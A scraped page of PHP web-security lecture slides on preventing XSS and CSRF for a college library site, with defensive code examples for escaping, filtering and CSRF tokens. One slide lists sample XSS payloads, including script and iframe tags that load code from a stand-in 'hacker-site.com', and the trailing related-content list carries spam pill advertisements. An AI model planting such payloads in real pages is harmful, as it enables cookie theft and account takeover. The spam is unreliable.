Web Application Security (PHP)
Zakieh Alizadeh
zakiehalizadeh@gmail.com
APA Laboratory – Ferdowsi University of Mashhad
Session 6
XSS & CSRF
XSS & CSRF
Scenarios:
• Preventing XSS and CSRF Attacks In College Library Website
Table Of Content
• Introduce XSS attacks
  o Strategies for Preventing of XSS
• Introduce CSRF Attacks
  o Strategies For Preventing Of CSRF
XSS & CSRF
• Introduce XSS attacks
• Strategies for Preventing of XSS
• Introduce CSRF Attacks
• Strategies For Preventing Of CSRF
XSS
Introduce Cross-site Scripting (XSS)
• XSS enables attackers to inject client-side script into web pages viewed by other users.
• In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed.
• Note: people often refer to Cross Site Scripting as CSS or XSS; the abbreviation CSS can be confused with Cascading Style Sheets (CSS).
XSS
Cross-site Scripting (XSS)
• Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might
  o compromise private information
  o manipulate or steal cookies
  o create requests that can be mistaken for those of a valid user
  o execute malicious code on the end-user systems.
XSS
Type
• There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS:
  o Non-persistent
  o Persistent
  o DOM-Based
XSS
Non-persistent
• These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.
XSS
Persistent
• The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping.
XSS
DOM-Based XSS Vulnerabilities
• Both reflected and stored XSS vulnerabilities involve a specific pattern of behavior, in which the application takes user-controllable data and displays this back to users in an unsafe way. A third category of XSS vulnerabilities does not share this characteristic. Here, the process by which the attacker's JavaScript gets executed is as follows:
  o A user requests a crafted URL supplied by the attacker and containing embedded JavaScript.
  o The server's response does not contain the attacker's script in any form.
  o When the user's browser processes this response, the script is executed nonetheless.
XSS
XSS Pattern
• There are many slight variations of this XSS attack; however, all XSS attacks follow the same pattern, which is depicted in the diagram below.
XSS
Cross-site Scripting (XSS)
• In the pie-chart below, created by the Web Hacking Incident Database for 2011 (WHID)
XSS
Cross-site Scripting (XSS)
• In what form does the data come?
Tag       Code
<SCRIPT>  <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
          <SCRIPT> alert("XSS"); </SCRIPT>
<BODY>    <BODY ONLOAD=alert("XSS")>
          <BODY BACKGROUND="javascript:alert('XSS')">
<IMG>     <IMG SRC="javascript:alert('XSS');">
<IFRAME>  <IFRAME SRC="http://hacker-site.com/xss.html">
<INPUT>   <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
XSS
Sanitization
• Sanitization is one of the approaches to input handling.
• Sometimes an application must accept data that cannot be guaranteed to be safe. Instead of rejecting this input, the application sanitizes it in various ways to prevent it from having any adverse effects.
• Potentially malicious characters may be:
  o removed from the data altogether, leaving only what is known to be safe
  o suitably encoded or "escaped" before further processing is performed
XSS & CSRF
• Introduce XSS attacks
• Strategies for Preventing of XSS
• Introduce CSRF Attacks
• Strategies For Preventing Of CSRF
XSS
Preventing XSS Attacks
• Filtering for XSS
• Escaping from XSS
XSS
Filtering for XSS
• A filter removes dangerous keywords, such as the infamous <SCRIPT> tag, JavaScript commands, CSS styles and other dangerous HTML markup (such as markup that contains event handlers).
• Many web developers choose to implement their own filtering mechanisms, usually as server-side code (a black list).
• Hackers usually have more experience than the web developers, and often manage to circumvent simple filters by using techniques such as hex encoding, Unicode character variations, line breaks and null characters in strings.
• It is recommended to use some sort of library that has been tried and tested by the community at large.
XSS
Filtering for XSS
• PHP boasts a more comprehensive library called HTML Purifier, which is licensed as open source and can be customised depending on your needs. HTML Purifier also boasts strict standards compliance and better features than other filters.
• Another interesting library you can use is HTML Markdown, which converts text from your users into standard and clean XHTML. This gives the advantage that minimal HTML markup can exist in your users' input (such as bold, underline and colours). HTML Markdown is a Perl library and does not explicitly advertise XSS prevention features, so it probably should not be your only line of defence.
XSS
Filtering for XSS
• PHP Functions:
  o filter_var()
  o strip_tags()
  o htmlentities()
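As an added example (not code from the slides), the three functions listed above applied to input for the college library website named in the scenario slide: filter_var() to validate a book id, strip_tags() to remove markup from a search query, and htmlentities() to encode what remains, which is the "removed altogether" versus "encoded or escaped" distinction of the Sanitization slide. It also shows the caveat a practitioner needs: strip_tags() keeps every attribute of a tag you allow, so an allow-list alone does not neutralise an event-handler payload. Function names and sample inputs are constructed for this example.

```php
<?php
// Added example (not from the slides): input-side filtering for a
// hypothetical college library search form, using the three PHP functions
// named on the slide. Function names and sample inputs are constructed.
declare(strict_types=1);

// filter_var(): validate typed input instead of "cleaning" it. A book id
// must be an integer in a known range; anything else is rejected outright.
function libraryBookId(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 999999],
    ]);
    return $id === false ? null : $id;
}

// strip_tags() with no allow-list: removes every tag from free text such
// as a search query, keeping only the text between the tags.
function stripAllMarkup(string $raw): string
{
    return strip_tags($raw);
}

// strip_tags() with an allow-list. Caveat from the PHP manual: allowed
// tags keep ALL of their attributes, event handlers included, so this
// alone is not an XSS defence for the tags you allow.
function stripKeepBold(string $raw): string
{
    return strip_tags($raw, '<b>');
}

// htmlentities(): encode every character that has a named HTML entity, so
// whatever survives filtering is displayed literally by the browser.
// ENT_QUOTES covers both quote styles (needed inside attribute values),
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
function encodeForHtml(string $raw): string
{
    return htmlentities($raw, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed sample inputs, the kind a user might submit to the library form.
$samples = [
    'id'     => '42',
    'bad_id' => '42 OR 1=1',
    'query'  => 'Operating Systems <script>alert("XSS")</script>',
    'review' => 'A <b onmouseover="alert(\'XSS\')">great</b> book',
];

var_dump(libraryBookId($samples['id']));      // a well-formed id is accepted
var_dump(libraryBookId($samples['bad_id']));  // non-integer input is rejected, not repaired
echo stripAllMarkup($samples['query']), "\n"; // tags removed, text between them kept
echo stripKeepBold($samples['review']), "\n"; // <b> survives together with its onmouseover
echo encodeForHtml($samples['review']), "\n"; // every special character encoded, nothing executable
```

The contrast between the last two lines is the point: filtering decides what to keep, and what it keeps can still carry an event handler, whereas encoding makes the browser treat the whole value as text.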
XSS
Escaping from XSS
• This is the primary means to disable an XSS attack. When performing escaping you are effectively telling the browser that the data you are sending should be treated as data and should not be interpreted in any other way.
• Escaping has been used to construct this article. I have managed to bring many scripts into your browser, but none of these scripts has executed! The technique used to do that is called escaping, or, as the W3C calls it, "Character Escaping".
• In HTML you can escape dangerous characters by using the &# sequence followed by the character's code.
• An escaped < character looks like this: &#60;. The > character is escaped like this: &#62;.
XSS
Sanitization
• Example
  o The usual defence against cross-site scripting attacks is to HTML-encode dangerous characters before these are embedded into pages of the application:
char   code
"      &quot;
'      &apos;
&      &amp;
<      &lt;
>      &gt;
XSS
Escaping from XSS
• PHP Functions:
  o htmlspecialchars()
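Added example, not part of the slides: output escaping with htmlspecialchars() for two pages of the college library site, covering the table above (quotes, ampersand, angle brackets) in both a text node and an attribute value, plus the double-encoding mistake that turns a legitimate ampersand into visible "&amp;". The helper e(), the page fragments and the sample inputs are this example's own; the flags are the ones the PHP manual documents for the function.

```php
<?php
// Added example (not from the slides): output escaping with htmlspecialchars()
// for the hypothetical college library pages. e(), the page fragments and the
// sample inputs are this example's own.
declare(strict_types=1);

// Escape untrusted text for an HTML element body or a quoted attribute value.
// ENT_QUOTES converts both ' and " (required inside attribute values),
// ENT_SUBSTITUTE replaces invalid UTF-8 rather than returning an empty string,
// and the charset is stated explicitly so the escaping matches what the
// browser will decode.
function e(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Search-results header: the term appears in a text node and in an attribute.
// Both positions are escaped, at the moment of output, with the same helper.
function renderSearchHeader(string $term): string
{
    return '<h2>Results for "' . e($term) . '"</h2>' . "\n"
         . '<input type="text" name="q" value="' . e($term) . '">' . "\n";
}

// Book list entry. The title is stored raw in the database and escaped here,
// once. Escaping on input as well would double-encode a legitimate "&" into
// "&amp;amp;", which the browser then displays as "&amp;".
function renderBookTitle(string $storedTitle): string
{
    return '<li>' . e($storedTitle) . '</li>' . "\n";
}

// Constructed inputs: a search term built from one of the payloads on the
// "In what form does the data come?" slide, and a title with a literal ampersand.
$term  = '"><script>alert("XSS")</script>';
$title = 'Algorithms & Data Structures';

echo renderSearchHeader($term);
echo renderBookTitle($title);
```

The closing quote and angle bracket at the start of $term are what would end the value attribute and open a tag if the value were written unescaped; after e() they arrive in the browser as &quot;&gt;&lt;script&gt; and are rendered as text.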
XSS & CSRF
• Introduce XSS attacks
• Strategies for Preventing of XSS
• Introduce CSRF Attacks
• Strategies For Preventing Of CSRF
CSRF
Introduction
• Cross-Site Request Forgery, or CSRF for short, is a common and regular online attack. CSRF also goes by the acronym XSRF and the phrase Sea-Surf.
• A CSRF attack is a malicious exploit of a website in which a user transmits malicious requests that the target website trusts, without the user's consent.
• In Cross-Site Scripting (XSS), the attacker exploits the trust a user has for a website; with CSRF, on the other hand, the attacker exploits the trust a website has in a user's browser.
CSRF
Introduction
1. You visit 'good site' A, where you log in and get a cookie to identify your session.
2. You leave site A, but forget to close your open session.
3. You visit 'bad site' B, where there is a malicious GET request hidden as an IMG.
4. Now you are inadvertently executing an action on site A, using the credentials from the cookie generated when you visited site A.
CSRF
CSRF Sequence Diagram
XSS & CSRF
 Introduce XSS attacks
 Strategies for Preventing of XSS
 Introduce CSRF Attacks
 Strategies For Preventing Of CSRF
CSRF
Prevention Measures That Do NOT Work
• Using a Secret Cookie
• Only Accepting POST Requests
• Multi-Step Transactions
• URL Rewriting
CSRF
Prevention Measure: Token Pattern
• A prevention measure could be the implementation and inclusion of tokens in a user's (current) session.
• Tokens are long cryptographic values that are difficult to guess. They are generated when a user's session begins and are associated with this particular user's session.
• This challenge token is included in each request and is used by the server side to verify the legitimacy of the end-user's request.
CSRF
More Recommendations: Synchronizer Token Pattern
• Checking the Referer header
• Challenge-Response
  o CAPTCHA
  o Re-Authentication (password)
• Client/User Prevention
  o Log off immediately after using a web application
  o Do not allow your browser to save usernames/passwords
  o Do not use the same browser to access sensitive applications and to surf the Internet freely (tabbed browsing)
CSRF
Vulnerable Patterns for CSRF
• Any application that accepts HTTP requests from an authenticated user without having some control to verify that the HTTP request is unique to the user's session.
• By checking the page rendering we need to see whether any unique identifiers are appended to the links rendered by the application in the user's browser. If there is no unique identifier relating to each HTTP request, tying the HTTP request to the user, we are vulnerable. The session ID is not enough, as the session ID will be sent anyway if a user clicks on a rogue link, since the user is already authenticated.
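Added example, not from the slides, that implements the token pattern of the "Prevention Measure: Token Pattern" slide and supplies the per-request identifier the "Vulnerable Patterns" slide says must be present, played against the four-step scenario of the CSRF introduction (logged-in session on site A, forged request from site B). The Referer check from the "More Recommendations" slide is included as a second layer. The session is a plain array so the script runs from the command line; csrfToken(), csrfField(), csrfVerify() and sameOrigin() are this example's own names, and the hostnames are constructed.

```php
<?php
// Added example (not from the slides): the synchronizer token pattern for a
// hypothetical "renew book" form on the college library site. The session is
// a plain array so the script runs from the command line; in a web request
// the same code would operate on $_SESSION. All names are this example's own.
declare(strict_types=1);

// Create the per-session token once, when the session starts (or on first use).
// random_bytes() is a CSPRNG; 32 random bytes are not guessable.
function csrfToken(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Embed the token in every state-changing form as a hidden field. A page on
// "bad site" B cannot read this value: the same-origin policy keeps it from
// reading site A's pages.
function csrfField(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

// Verify on every state-changing request. The session cookie is NOT the
// check: the browser attaches it to a forged request as well. hash_equals()
// compares in constant time so the token does not leak through timing.
function csrfVerify(array $session, array $post): bool
{
    if (!isset($session['csrf_token'], $post['csrf_token'])
        || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Second layer, the Referer check from the slides (Origin preferred when
// present). A missing header counts as a mismatch, so stripping the header
// does not bypass the check.
function sameOrigin(array $headers, string $expectedHost): bool
{
    $source = $headers['Origin'] ?? $headers['Referer'] ?? null;
    if ($source === null) {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// --- constructed requests, following the four-step scenario ------------------
$session = [];                       // step 1: logged in on "good site" A
echo '<form method="post" action="/renew.php">', csrfField($session),
     '<input type="hidden" name="book_id" value="42"><button>Renew</button></form>', "\n";

// Legitimate submission from site A's own form: token present and matching.
$legit = ['book_id' => '42', 'csrf_token' => $session['csrf_token']];
var_dump(csrfVerify($session, $legit));

// Steps 3 and 4: a request triggered from "bad site" B rides on the cookie
// but carries no token.
$forged = ['book_id' => '42'];
var_dump(csrfVerify($session, $forged));

// A guessed token is rejected as well.
$guessed = ['book_id' => '42', 'csrf_token' => str_repeat('0', 64)];
var_dump(csrfVerify($session, $guessed));

// Origin/Referer layer, with constructed hostnames.
var_dump(sameOrigin(['Origin' => 'https://library.example.edu'], 'library.example.edu'));
var_dump(sameOrigin(['Referer' => 'https://other.example/page.html'], 'library.example.edu'));
```

The check is tied to the session, not to the request method or to any cookie, which is why the slides list "Only Accepting POST Requests" and "Using a Secret Cookie" among the measures that do not work on their own: a request forged from site B can be a POST and carries every cookie the browser holds for site A, but it cannot carry a token it has never seen.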
XSS & CSRF

Mais conteúdo relacionado

Mais procurados

Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
A7 Missing Function Level Access Control
A7   Missing Function Level Access ControlA7   Missing Function Level Access Control
A7 Missing Function Level Access Controlstevil1224
 
Session9-File Upload Security
Session9-File Upload SecuritySession9-File Upload Security
Session9-File Upload Securityzakieh alizadeh
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Application Security TRENDS – Lessons Learnt- Firosh Ummer
Application Security TRENDS – Lessons Learnt- Firosh UmmerApplication Security TRENDS – Lessons Learnt- Firosh Ummer
Application Security TRENDS – Lessons Learnt- Firosh UmmerOWASP-Qatar Chapter
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharSandeep Kumbhar
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Web application sec_3
Web application sec_3Web application sec_3
Web application sec_3vhimsikal
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf)   it 6873 presentationA8 cross site request forgery (csrf)   it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationAlbena Asenova-Belal
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Nilesh Sapariya
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideLudovic Petit
 

Mais procurados (20)

Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
A7 Missing Function Level Access Control
A7   Missing Function Level Access ControlA7   Missing Function Level Access Control
A7 Missing Function Level Access Control
 
Session9-File Upload Security
Session9-File Upload SecuritySession9-File Upload Security
Session9-File Upload Security
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Application Security TRENDS – Lessons Learnt- Firosh Ummer
Application Security TRENDS – Lessons Learnt- Firosh UmmerApplication Security TRENDS – Lessons Learnt- Firosh Ummer
Application Security TRENDS – Lessons Learnt- Firosh Ummer
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Web application sec_3
Web application sec_3Web application sec_3
Web application sec_3
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf)   it 6873 presentationA8 cross site request forgery (csrf)   it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference Guide
 

Semelhante a Session7-XSS & CSRF

Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site ScriptingAli Mattash
 
CROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.pptCROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.pptyashvirsingh48
 
XSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing toolXSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing toolArjun Jain
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encodingEoin Keary
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Manish Kumar
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfyashvirsingh48
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Barrel Software
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
React security vulnerabilities
React security vulnerabilitiesReact security vulnerabilities
React security vulnerabilitiesAngelinaJasper
 
logout.php Session Data after Logout Username Email . $_.docx
logout.php Session Data after Logout  Username  Email  . $_.docxlogout.php Session Data after Logout  Username  Email  . $_.docx
logout.php Session Data after Logout Username Email . $_.docxsmile790243
 

Semelhante a Session7-XSS & CSRF (20)

Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
 
CROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.pptCROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.ppt
 
XSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing toolXSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing tool
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
React security vulnerabilities
React security vulnerabilitiesReact security vulnerabilities
React security vulnerabilities
 
logout.php Session Data after Logout Username Email . $_.docx
logout.php Session Data after Logout  Username  Email  . $_.docxlogout.php Session Data after Logout  Username  Email  . $_.docx
logout.php Session Data after Logout Username Email . $_.docx
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
 

Mais de zakieh alizadeh

Session11-NoSQL InjectionPHP Injection
Session11-NoSQL InjectionPHP Injection Session11-NoSQL InjectionPHP Injection
Session11-NoSQL InjectionPHP Injection zakieh alizadeh
 
Session6-Protecct Sensetive Data
Session6-Protecct Sensetive DataSession6-Protecct Sensetive Data
Session6-Protecct Sensetive Datazakieh alizadeh
 
Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers zakieh alizadeh
 
Validating and Sanitizing User Data
Validating and Sanitizing  User DataValidating and Sanitizing  User Data
Validating and Sanitizing User Datazakieh alizadeh
 
Session3 data-validation
Session3 data-validationSession3 data-validation
Session3 data-validationzakieh alizadeh
 

Mais de zakieh alizadeh (8)

Session11-NoSQL InjectionPHP Injection
Session11-NoSQL InjectionPHP Injection Session11-NoSQL InjectionPHP Injection
Session11-NoSQL InjectionPHP Injection
 
Session6-Protecct Sensetive Data
Session6-Protecct Sensetive DataSession6-Protecct Sensetive Data
Session6-Protecct Sensetive Data
 
Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers
 
yii framework
yii frameworkyii framework
yii framework
 
Web security Contents
Web security ContentsWeb security Contents
Web security Contents
 
Validating and Sanitizing User Data
Validating and Sanitizing  User DataValidating and Sanitizing  User Data
Validating and Sanitizing User Data
 
Session3 data-validation
Session3 data-validationSession3 data-validation
Session3 data-validation
 
Introduce Yii
Introduce YiiIntroduce Yii
Introduce Yii
 

Último

LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5   - SESSION 1 2023 (1).pptx - PDF 123456LEVEL 5   - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456KiaraTiradoMicha
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrainmasabamasaba
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfonteinmasabamasaba
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfproinshot.com
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfkalichargn70th171
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisamasabamasaba
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024Mind IT Systems
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
